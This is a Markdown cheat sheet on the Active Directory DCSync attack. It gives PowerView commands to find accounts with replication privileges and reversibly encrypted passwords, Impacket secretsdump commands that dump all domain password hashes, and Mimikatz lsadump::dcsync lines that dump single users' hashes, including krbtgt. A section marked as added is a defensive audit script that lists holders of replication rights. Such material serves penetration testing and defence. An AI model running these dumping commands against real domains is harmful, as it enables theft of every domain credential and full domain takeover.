# DCSync

## Description

To carry out a DCSync attack you need control of an account that holds the domain replication privileges:

* Replicating Directory Changes
* Replicating Directory Changes All

Domain administrators hold these privileges by default.

## Verify domain replication privileges

Checking whether a given user holds domain replication privileges.

```powershell
# PowerView
$sid = Convert-NameToSid <user>
Get-ObjectAcl "DC=ACME,DC=LOCAL" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | Select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
```
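As an added audit check that is not part of the original page, the script below reads the domain head's ACL with the RSAT ActiveDirectory module and its `AD:` drive (assumed to be installed and readable by the caller) and lists every principal that holds a replication extended right, including those that get it implicitly through an unscoped ExtendedRight or GenericAll entry, which the PowerView filter above does not catch.

```powershell
# Added example (not from the original page): list every principal holding a
# domain-replication right on the domain naming context. Assumes the RSAT
# ActiveDirectory module is installed and the caller can read the domain head ACL.
Import-Module ActiveDirectory

# Well-known schema GUIDs of the extended rights that DCSync needs.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    param(
        # Naming context to audit; defaults to the current domain's head.
        [string]$DistinguishedName = (Get-ADDomain).DistinguishedName
    )
    $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path ("AD:\" + $DistinguishedName)

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString()

        if ($ReplicationRights.ContainsKey($guid)) {
            $right = $ReplicationRights[$guid]
        }
        elseif ($ace.ObjectType -eq [guid]::Empty -and
                ([int]($ace.ActiveDirectoryRights -band $extendedRight)) -ne 0) {
            # An unscoped ExtendedRight (or GenericAll, which includes it) grants
            # every extended right, so the replication rights are implied.
            $right = 'All extended rights (' + $ace.ActiveDirectoryRights + ')'
        }
        else { continue }

        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Right     = $right
            Inherited = $ace.IsInherited
        }
    }
}

# Administrators and the domain controller groups are the expected default
# holders; review any other identity that shows up in this list.
Get-ReplicationRightHolders | Sort-Object Identity | Format-Table -AutoSize
```

Run it periodically from a domain-joined admin workstation and diff the output against the previous run; a new holder of either Get-Changes right is a high-priority finding.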

## Reversible encryption password storage

### ActiveDirectory PowerShell module

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

### PowerView

```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | Select SamAccountName, UserAccountControl
```

## Impacket

Dumping all domain hashes.

```shell
secretsdump.py -outputfile hashes.txt -just-dc <ACME.LOCAL>/<user>@<IP-address-DC>
```

Dumping the hashes of a single domain user.

```shell
secretsdump.py -outputfile hashes.txt -just-dc <ACME.LOCAL>/<user>@<IP-address-DC> -just-dc-user <username> -pwd-last-set -user-status -history
```

## Mimikatz

Dumping the hashes of a single domain user.

```shell
.\mimikatz.exe
lsadump::dcsync /user:<ACME.LOCAL>\<user>
# KRBTGT user
lsadump::dcsync /user:<ACME.LOCAL>\krbtgt
```

## Invoke-Mimikatz

Dumping the hashes of a single domain user.

```powershell
# User
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<ACME.LOCAL>\<user>"'
# KRBTGT user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<ACME.LOCAL>\krbtgt"'
```

